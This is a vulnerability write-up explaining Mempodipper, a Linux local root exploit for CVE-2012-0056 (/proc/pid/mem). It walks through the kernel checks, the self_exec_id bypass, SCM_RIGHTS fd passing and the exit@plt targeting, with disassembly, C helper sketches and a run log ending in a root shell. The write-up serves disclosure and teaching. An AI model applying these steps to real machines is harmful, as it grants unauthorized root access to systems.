Linux Local Privilege Escalation via SUID /proc/pid/mem Write


Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing a process's memory directly, by seeking to the same addresses the process itself uses in its virtual address space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, so the prior #ifdef that disabled writing to arbitrary process memory was removed. Anyone with the correct permissions could now write to process memory. It turns out, of course, that the permission checking was done poorly. This means that all Linux kernels >= 2.6.39 are vulnerable, up until the fix commit a couple of days ago. Let's take the old kernel code step by step and learn what's wrong with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
{
    file->private_data = (void*)((long)current->self_exec_id);
    /* OK to pass negative loff_t, we can catch out-of-range */
    file->f_mode |= FMODE_UNSIGNED_OFFSET;
    return 0;
}

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). It simply records the self_exec_id of the opening process (current) in file->private_data, for checking later during reads and writes.

Writes (and reads), however, are subject to permission checks. Let's take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
             size_t count, loff_t *ppos)
{
/* unimportant code removed for blog post */

    struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);

/* unimportant code removed for blog post */

    mm = check_mem_permission(task);
    copied = PTR_ERR(mm);
    if (IS_ERR(mm))
        goto out_free;

/* unimportant code removed for blog post */

    if (file->private_data != (void *)((long)current->self_exec_id))
        goto out_mm;

/* unimportant code removed for blog post
 * (the function goes on to write the buffer into the memory) */
}

So there are two relevant checks in place to guard against unauthorized writes: check_mem_permission and self_exec_id. Let's take the first one first and the second one second.

check_mem_permission simply calls into __check_mem_permission, so here is the code of that function:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
    struct mm_struct *mm;

    mm = get_task_mm(task);
    if (!mm)
        return ERR_PTR(-EINVAL);

    /*
     * A task can always look at itself, in case it chooses
     * to use system calls instead of load instructions.
     */
    if (task == current)
        return mm;

    /*
     * If current is actively ptrace'ing, and would also be
     * permitted to freshly attach with ptrace now, permit it.
     */
    if (task_is_stopped_or_traced(task)) {
        int match;
        match = (ptrace_parent(task) == current);
        if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
            return mm;
    }

    /*
     * No one else is allowed.
     */
    return ERR_PTR(-EPERM);
}

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process doing the writing, or current (the writer) has esoteric ptrace-level permissions over task (the process being written to): it is actively ptracing task and would also be allowed to attach to it afresh. Maybe you think you can trick the ptrace code? It's tempting. But I don't know. Let's instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by "Unknown id: ". So we can open an fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to make stderr refer to the mem fd, and then exec su $shellcode, so that su itself writes a shell spawner into its own process memory, and then we have root. Really? Not so easy.
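The reason the dup2 trick steers su's output is that dup2 makes fd 2 share the target fd's open file description, including its file offset, so whatever lseek chose beforehand decides where stderr's bytes land. Here is a minimal sketch of that mechanism, assuming an ordinary temporary file stands in for the mem fd so the example is harmless and testable. The helper name write_via_stderr_at is hypothetical; it also saves and restores the real stderr so the caller is left as it was.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: point stderr at `fd`, positioned at `offset`, print
 * su-style "Unknown id: <text>", then restore the original stderr.
 * dup2() makes fd 2 share fd's open file description, so the lseek() on
 * fd decides where the printed bytes land. Returns 0 on success, -1 on error. */
static int write_via_stderr_at(int fd, off_t offset, const char *text)
{
    int saved = dup(STDERR_FILENO);          /* keep a copy of the real stderr */
    if (saved < 0)
        return -1;

    fflush(stderr);                          /* don't leak pending output into fd */
    if (lseek(fd, offset, SEEK_SET) != offset ||
        dup2(fd, STDERR_FILENO) < 0) {
        close(saved);
        return -1;
    }

    /* Same shape as su's error: fixed prefix, then caller-chosen text. */
    fprintf(stderr, "Unknown id: %s", text);
    fflush(stderr);

    dup2(saved, STDERR_FILENO);              /* restore the real stderr */
    close(saved);
    return 0;
}
```

For example, after filling a 64-byte temp file with dots, write_via_stderr_at(fd, 16, "payload") leaves bytes 16 through 34 reading "Unknown id: payload", with the dots on either side untouched.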

Here the other restriction comes into play. After it passes the task == current test, it then checks whether the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It's only referenced in a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
{
/* massive amounts of code trimmed for the purpose of this blog post */

    /* An exec changes our domain. We are no longer part of the thread
       group */

    current->self_exec_id++;

    flush_signal_handlers(current, 0);

/* remaining code trimmed */
}

self_exec_id is incremented each time a process execs. In this case, it ensures that you can't open the fd in a non-suid process, dup2, and then exec to a suid process... which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?
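The counter bookkeeping can be modeled in a few lines of user-space C. This is a toy model, not kernel code: struct task and the model_* functions are hypothetical stand-ins that track only self_exec_id, and the separate task == current check is deliberately left out.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model, not kernel code: each task is reduced to its exec counter. */
struct task {
    unsigned int self_exec_id;
};

/* fork(): the child is a copy of the parent, counter included. */
static struct task model_fork(const struct task *parent)
{
    return *parent;
}

/* exec(): mirrors setup_new_exec()'s current->self_exec_id++. */
static void model_exec(struct task *t)
{
    t->self_exec_id++;
}

/* mem_open(): records the OPENER's counter, as in file->private_data. */
static unsigned int model_mem_open(const struct task *opener)
{
    return opener->self_exec_id;
}

/* mem_write(): passes only if the writer's counter matches the recorded one. */
static bool model_mem_write_ok(unsigned int recorded, const struct task *writer)
{
    return recorded == writer->self_exec_id;
}
```

In the naive attack, the process opens its own mem with a counter of 0 and then execs su, which moves it to 1, so model_mem_write_ok returns false. If instead a forked child execs first (moving its counter to 1) and then opens the parent's mem, the recorded value is 1, which matches the parent once the parent execs su; that is the workaround the next paragraph describes.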

Here's how to get around it. We fork a child, and inside that child, we exec a new process. The freshly forked child starts with a self_exec_id equal to its parent's; when it execs, its self_exec_id increments by one. Meanwhile, the parent is about to exec our shellcode-writing su, which will increment its self_exec_id to that same value. So inside the child's new process, we open an fd to /proc/parent-pid/mem, using the pid of the parent process rather than our own (as was the case before). We can open the fd like this because there is no permission checking for a mere open. At open time, the child's self_exec_id has already been incremented to exactly the value the parent's self_exec_id will have once it execs su, and that is the value recorded in the fd. Finally, we pass the opened fd from the child back to the parent (using some very black Unix domain socket magic: SCM_RIGHTS), do our dup2ing, and exec into su with the shellcode. Inside su, task == current holds because the fd refers to the parent's pid, which is now su itself, and the self_exec_id check passes as well.
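The fd handoff is standard Unix descriptor passing: the sender attaches the descriptor as SCM_RIGHTS ancillary data to sendmsg, and the receiver gets a new descriptor referring to the same open file from recvmsg. Below is a minimal sketch for a socketpair shared across fork; send_fd and recv_fd are hypothetical helper names, not taken from the mempodipper source.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: send one fd over a connected AF_UNIX socket. */
static int send_fd(int sock, int fd)
{
    char byte = 0;                           /* one byte of ordinary data */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union { struct cmsghdr align; char buf[CMSG_SPACE(sizeof(int))]; } u;
    memset(&u, 0, sizeof u);

    struct msghdr msg = { 0 };
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;            /* "duplicate these fds into the receiver" */
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one fd; returns the new fd number or -1. */
static int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union { struct cmsghdr align; char buf[CMSG_SPACE(sizeof(int))]; } u;

    struct msghdr msg = { 0 };
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS || cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;

    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

A typical use: create the pair with socketpair(AF_UNIX, SOCK_STREAM, 0, sv) before fork, have the child call send_fd(sv[1], fd), and have the parent call recv_fd(sv[0]). On a Linux stream socket the control message needs at least one byte of ordinary data to travel with, which is why both helpers move a single dummy byte.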

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes process address spaces, making it impossible to know in advance where to write. Should we spend time on more cleverness to read process memory and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
   Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise readelf would report "DYN" instead of "EXEC"). It turns out that su on the vast majority of distros is not compiled with PIE, so ASLR does not apply to the binary's .text section! So we've chosen su wisely: its code is always loaded at the same addresses. To find the right place to write to, let's check out the assembly surrounding the printing of the "Unknown id: blabla" error message.
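The EXEC/DYN distinction that readelf prints comes from the e_type field of the ELF header. Here is a minimal sketch that reads it directly; elf_type is a hypothetical helper name, and it assumes the file is readable, which is exactly what Gentoo's permissions (Update 3) take away. Note that ET_DYN covers both PIE executables and shared libraries; either way the code is relocatable.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <elf.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: return the ELF e_type of `path` (ET_EXEC for a
 * fixed-address executable, ET_DYN for a PIE or shared object), or -1.
 * e_type is the 16-bit field right after the 16-byte e_ident in both
 * 32- and 64-bit ELF headers; its byte order is given by e_ident[EI_DATA]. */
static int elf_type(const char *path)
{
    unsigned char hdr[EI_NIDENT + 2];

    int fd = open(path, O_RDONLY);           /* fails on unreadable binaries */
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, hdr, sizeof hdr);
    close(fd);

    if (n != (ssize_t)sizeof hdr || memcmp(hdr, ELFMAG, SELFMAG) != 0)
        return -1;                           /* too short, or not ELF */

    if (hdr[EI_DATA] == ELFDATA2LSB)
        return hdr[EI_NIDENT] | (hdr[EI_NIDENT + 1] << 8);
    if (hdr[EI_DATA] == ELFDATA2MSB)
        return (hdr[EI_NIDENT] << 8) | hdr[EI_NIDENT + 1];
    return -1;
}
```

A result of ET_EXEC for /bin/su would indicate a fixed-address build like the one above; a PIE build returns ET_DYN.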

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 <dcgettext@plt>

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 <stderr>
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 <__fprintf_chk@plt>

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 <closelog@plt>

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 <exit@plt>

We therefore want to target 0x402178, the PLT entry for exit that su calls right after printing: once our shellcode sits there, su's call to exit jumps straight into it. In an exploit, we can automate finding the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'

So naturally, we want to write to 0x402178 minus the length of the string "Unknown id: " (12 bytes, giving 0x40216c), so that our shellcode lands exactly at exit@plt.
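Both steps, pulling the address out of objdump's symbol line and subtracting the prefix length, fit in two small functions. This is a sketch assuming the objdump symbol-line format the one-liner above greps for (hex address, a space, then `<symbol>:`); both function names are hypothetical.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: parse an `objdump -d` symbol header such as
 * "0000000000402178 <exit@plt>:" and return its address, or 0 if the
 * line does not start with a hex address followed by " <". */
static unsigned long parse_objdump_symbol(const char *line)
{
    char *end;
    unsigned long addr = strtoul(line, &end, 16);
    if (end == line || strncmp(end, " <", 2) != 0)
        return 0;
    return addr;
}

/* Hypothetical helper: the offset to seek to so that whatever follows
 * `prefix` in the printed message starts exactly at `target`. */
static unsigned long seek_target(unsigned long target, const char *prefix)
{
    return target - strlen(prefix);
}
```

Given "0000000000402178 <exit@plt>:", parse_objdump_symbol returns 0x402178, and seek_target(0x402178, "Unknown id: ") returns 0x40216c, the same offset the exploit reports seeking to in the run below.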

The shellcode should be simple and standard: it sets the uid and gid to 0 and execs a shell. If we want to be clever, we can also restore stderr: before dup2ing the memory fd onto stderr, we dup stderr to another fd, and then in the shellcode we dup2 that other fd back onto stderr.

In the end, the exploit works like a charm with total reliability:

CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami

You can watch a video of it in action.

Thanks to Dan Rosenberg for his continued advice and support. I'm currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes, or if someone else publishes first, I'll publish. If you're a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: ironically, some other folks evidently used this blog post to make exploits, and published them. So, here's mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the "fedora" branch of the git repository, and a video demonstration is also available.

Update 3: Gentoo is smart enough to remove read permissions on SUID binaries, making it impossible to find the exit@plt offset using objdump. I determined another way to do this, using ptrace, which lets a tracer inspect the memory of a running program. A SUID program run under ptrace doesn't get its elevated privileges, but that's fine, since we simply want to find internal memory locations. By parsing the binary's opcodes at the right moment, we can decipher the target address of the next call after the error message is printed. I've created a standalone utility that returns the offset, and have also integrated it into the main mempodipper source.
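The call-target decoding in that last step is plain x86 arithmetic: an E8 call carries a signed 32-bit little-endian displacement relative to the address of the following instruction. The sketch below shows only that decoding on bytes already in hand; fetching them from a traced process (for instance with PTRACE_PEEKTEXT) is left out, and call_rel32_target is a hypothetical name, not the author's utility.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: decode an x86 `call rel32` (opcode 0xE8) found at
 * `addr`. The 32-bit displacement is little-endian and signed, and is
 * relative to the next instruction, so target = addr + 5 + rel32.
 * Returns 0 if the bytes are not an E8 call. */
static uint64_t call_rel32_target(uint64_t addr, const unsigned char insn[5])
{
    if (insn[0] != 0xe8)
        return 0;

    uint32_t raw = (uint32_t)insn[1] | ((uint32_t)insn[2] << 8) |
                   ((uint32_t)insn[3] << 16) | ((uint32_t)insn[4] << 24);
    int32_t rel;
    memcpy(&rel, &raw, sizeof rel);           /* reinterpret the bits as signed */

    return addr + 5 + (uint64_t)(int64_t)rel; /* negative rel wraps correctly */
}
```

Fed the bytes from the disassembly above, the call at 0x4036ad (e8 c6 ea ff ff) decodes to 0x402178, exit@plt, and the call at 0x403683 (e8 e0 ed ff ff) decodes to 0x402468, dcgettext@plt.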

{As always, this work is strictly academic and is not intended for use beyond research and education.}